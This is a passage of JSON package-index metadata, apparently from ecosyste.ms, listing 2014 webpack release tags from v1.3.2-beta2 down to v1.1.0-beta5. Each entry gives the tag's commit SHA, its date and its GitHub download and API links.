gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"http